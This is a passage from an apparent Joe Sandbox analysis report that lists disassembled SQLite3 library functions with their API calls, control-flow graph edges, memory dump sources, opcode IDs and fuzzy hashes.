                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0
                                                    • Opcode ID: 4c17f01cfef2abfffd977a53258d37b82b8616f7ee04fa53e5609ee599c1189c
                                                    • Instruction ID: 59ee6d9d32c830c1cf201d1ecc861426c42af11afa13175e5b8dd2ffdc50586c
                                                    • Opcode Fuzzy Hash: 4c17f01cfef2abfffd977a53258d37b82b8616f7ee04fa53e5609ee599c1189c
                                                    • Instruction Fuzzy Hash: 4E21DE70A18F418BDB009FBAC48534D7BE1BB8A318F25CD2AE454D7384E775C8D08B81
                                                    Function 61E273A9 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 873 61e273a9-61e273c0 malloc 874 61e273c2-61e273cd 873->874 875 61e273cf-61e273ea sqlite3_log 873->875 876 61e273ed-61e273f2 874->876 875->876
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: mallocsqlite3_log
                                                    • String ID:
                                                    • API String ID: 2785431543-0
                                                    • Opcode ID: 2e44612e9fd3c4476044540575e1ce678fdb7cdb3b295b10ff22ad3ae2474d02
                                                    • Instruction ID: b6c4dc49b23da77367ad751bbe71f145353df94cb38c1bd05c0577f7c6c78711
                                                    • Opcode Fuzzy Hash: 2e44612e9fd3c4476044540575e1ce678fdb7cdb3b295b10ff22ad3ae2474d02
                                                    • Instruction Fuzzy Hash: 88F039B0C0830A9FCB00AFA6C8C160DBBF4AF44248F14C46DE9888F251D239E990CB51
                                                    Function 61E113CA Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 877 61e113ca-61e113e4 878 61e113f4-61e11406 877->878 879 61e113e6-61e113ef sqlite3_free 877->879 880 61e11444-61e11446 878->880 881 61e11408-61e1140a 878->881 879->878 882 61e11448-61e11461 880->882 881->880 883 61e1140c-61e11411 881->883 884 61e11463-61e11469 882->884 885 61e114b2-61e114c8 882->885 883->882 886 61e11413-61e1141e call 61e016dd call 61e0fff3 883->886 887 61e1146b-61e1146f 884->887 888 61e114cf-61e114d8 885->888 894 61e11423-61e11430 call 61e016ee 886->894 890 61e11471-61e11484 887->890 891 61e11486-61e114b0 887->891 890->887 891->888 894->882 897 61e11432-61e11442 call 61e017c7 894->897 897->882
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E113EF
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 1324421599-0
                                                    • Opcode ID: 9941572037a32c0eec94e9a9154d16af9296133e98b7c643a58ef7ce74f56cc5
                                                    • Instruction ID: f27234330f7acdf11439aa65c47a6c83266749471a2f3ea48f75eaf3d0b24167
                                                    • Opcode Fuzzy Hash: 9941572037a32c0eec94e9a9154d16af9296133e98b7c643a58ef7ce74f56cc5
                                                    • Instruction Fuzzy Hash: 8F31AE71A487468BEB18CFF9C4913DABAF1AF99308F14853DC8AA97340D775E451CB90

                                                    Non-executed Functions

                                                    Function 61E243C1 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_int.SQLITE3 ref: 61E24416
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E24436
                                                    • sqlite3_value_blob.SQLITE3 ref: 61E24443
                                                    • sqlite3_value_text.SQLITE3 ref: 61E2445A
                                                    • sqlite3_value_int.SQLITE3 ref: 61E244AA
                                                    • sqlite3_result_text64.SQLITE3 ref: 61E245FA
                                                    • sqlite3_result_blob64.SQLITE3 ref: 61E24654
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 3992148849-0
                                                    • Opcode ID: 107549c8a72064570b38823e48bb2c532a9bacf4da4b4974a2a4d917f370ddcf
                                                    • Instruction ID: 63b76c21cb129977823654ff4be435233f7d1c242361318a3d8d57488df42bd8
                                                    • Opcode Fuzzy Hash: 107549c8a72064570b38823e48bb2c532a9bacf4da4b4974a2a4d917f370ddcf
                                                    • Instruction Fuzzy Hash: AF91A271E446598FDB11CFA8C8A069DBBF1BF89324F28C22ED8A497794D730D842CB51
                                                    Function 61E6F685 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E6F69E
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E6F8AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: BINARY$INTEGER$^Ma
                                                    • API String ID: 1477753154-3492570885
                                                    • Opcode ID: abd0b8d665cc3c68ec85ac04bf887975db08f01a1329c24f947f0da37ebc1690
                                                    • Instruction ID: 234776b1b15307dde23b1198c573a1db288731771267a45d30f4ba40d645c52a
                                                    • Opcode Fuzzy Hash: abd0b8d665cc3c68ec85ac04bf887975db08f01a1329c24f947f0da37ebc1690
                                                    • Instruction Fuzzy Hash: CF712475A046599FDB00CFA9C490B9EBBF5BF88358F65C129E858AB350D738E841CF90
                                                    Function 61E1BB5F Relevance: 7.8, APIs: 5, Instructions: 337COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                                    • String ID:
                                                    • API String ID: 1984881590-0
                                                    • Opcode ID: dd4787cc72696d7067865ea9881abbf8079be152858e3061d469359c51a3b0d3
                                                    • Instruction ID: 8f43292f2a1424c76a0014d0653c16920290d54af297e7b764d0b7bcdac2d8b9
                                                    • Opcode Fuzzy Hash: dd4787cc72696d7067865ea9881abbf8079be152858e3061d469359c51a3b0d3
                                                    • Instruction Fuzzy Hash: E7E1D675A042498FDB08CF68C481A9ABBF2FF48314F29C569EC15AB359D734E952CF90
                                                    Function 61E89A10 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 61E89A49
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89A5A
                                                    • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89A62
                                                    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89A6A
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89A79
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                    • String ID:
                                                    • API String ID: 1445889803-0
                                                    • Opcode ID: 7d0bb45da3f7f0f71558e6912cc1e75bb20f9bbfce7bc488760adbb7e5c196c4
                                                    • Instruction ID: 2cd64883c432e06ddc1fdba03dfdb4d14b5af5e67d2f2473d43562360c442463
                                                    • Opcode Fuzzy Hash: 7d0bb45da3f7f0f71558e6912cc1e75bb20f9bbfce7bc488760adbb7e5c196c4
                                                    • Instruction Fuzzy Hash: 941191B59157018FCB00DFB9E88854FBBF4FB89654F010929E448C7300DB30D4888BE2
                                                    Function 61E42CFF Relevance: 6.4, APIs: 4, Instructions: 418COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E42D14
                                                      • Part of subcall function 61E1318F: sqlite3_mutex_try.SQLITE3(?,?,?,61E1320F), ref: 61E1312F
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E42D2D
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E42E41
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E4325C
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                    • String ID:
                                                    • API String ID: 2068833801-0
                                                    • Opcode ID: f1c92b080b9d5956e81ba7aa6847987b97b3b0db169b4c4be62150d5b14ed5d1
                                                    • Instruction ID: 8d94079d89d23e62b799f417fbfbd2aea4aa47ced74ffb50affff936aecfdc38
                                                    • Opcode Fuzzy Hash: f1c92b080b9d5956e81ba7aa6847987b97b3b0db169b4c4be62150d5b14ed5d1
                                                    • Instruction Fuzzy Hash: A5022674A0461ACFDB11CFA9E480A9DBBF1BF98318F24C529E855EB351D774E882CB41
                                                    Function 61E290BC Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 61E290FE
                                                      • Part of subcall function 61E28F2C: sqlite3_mutex_leave.SQLITE3 ref: 61E28F6B
                                                    • sqlite3_bind_double.SQLITE3 ref: 61E29121
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465616180-0
                                                    • Opcode ID: cc63f294f468b2fc6b9245ac60912d7e8e22444bd9a7d46bb6d0f0920327c9a6
                                                    • Instruction ID: 8d57476291fbd522d76112eedec43fcb6d4fb5fd62549bd6c984a211a0d96f55
                                                    • Opcode Fuzzy Hash: cc63f294f468b2fc6b9245ac60912d7e8e22444bd9a7d46bb6d0f0920327c9a6
                                                    • Instruction Fuzzy Hash: 2C219FB05087149FDB08DF19D4A06A9BBE0FF48320F24D55EEDA84B395D335C881CB82
                                                    Function 61E291A3 Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E291BD
                                                    • sqlite3_bind_zeroblob.SQLITE3 ref: 61E291E2
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29202
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 2187339821-0
                                                    • Opcode ID: c8608e4cb6ee0876b57b61b2180a92bdbece601e1911d1318902c1edc24ed192
                                                    • Instruction ID: 77bf373b9fd8adc87e02b37adba707bc9a38c18e7f96281bc04edd918360ec58
                                                    • Opcode Fuzzy Hash: c8608e4cb6ee0876b57b61b2180a92bdbece601e1911d1318902c1edc24ed192
                                                    • Instruction Fuzzy Hash: 2F011E74A046298FCB00DF6AD4D485ABBE5FF89364B25C45DE8448B314D734E851CB52
                                                    Function 61E16CE7 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E16C75
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E16CD8
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0
                                                    • Opcode ID: f3fd7f710b8cb58e5d8df78b2c8c71e45e0ad845904d09703b9b952c42c5a62c
                                                    • Instruction ID: 9264231c759f21ec1eacf73e0c9cbf447bb2e442db342841f29aa2241c5d6104
                                                    • Opcode Fuzzy Hash: f3fd7f710b8cb58e5d8df78b2c8c71e45e0ad845904d09703b9b952c42c5a62c
                                                    • Instruction Fuzzy Hash: FE21FA34A042498FDB04DFA9C485B9DFBF4FF49318F1581A9E818AB351D3B9E881CB91
                                                    Function 61E16B17 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E16B2D
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E16B6D
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0
                                                    • Opcode ID: dd13d1e32f43967fbf7b724d2c1c9586564685662d10547254964a0c04867b99
                                                    • Instruction ID: 658271934beef23ad6bd130bbd29e932e4437c1318f861ef20f99b76974c4330
                                                    • Opcode Fuzzy Hash: dd13d1e32f43967fbf7b724d2c1c9586564685662d10547254964a0c04867b99
                                                    • Instruction Fuzzy Hash: 62F0C8356082518BC7009F65C4C1BA9BBF4FF89318F19C169DC445F31AD374D882C791
                                                    Function 61E28D9E Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28D80
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465156292-0
                                                    • Opcode ID: 50ffae906af9e372975363c7fc699eebd7abf999069909b2f3c308e81c6027d3
                                                    • Instruction ID: 39ab5387ad97741b27c13ea5053cc7ffc650fe01d5e426fd8c9cffdcdc38f9d6
                                                    • Opcode Fuzzy Hash: 50ffae906af9e372975363c7fc699eebd7abf999069909b2f3c308e81c6027d3
                                                    • Instruction Fuzzy Hash: D7318C74A046598FCB00DF69C4D0AAEBBF9FF8D264F24812AE818DB354D734D906CB91
                                                    Function 61E28FD2 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29031
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465156292-0
                                                    • Opcode ID: 6e355b272afe9ac69e58bbb01d13da570659c931cfd7aa6ee8c14bb6a499c4c6
                                                    • Instruction ID: c667c84386bb310ac63f594ffc19cf801ecfdea8d5cd3f5ea3c9e868c7c43d74
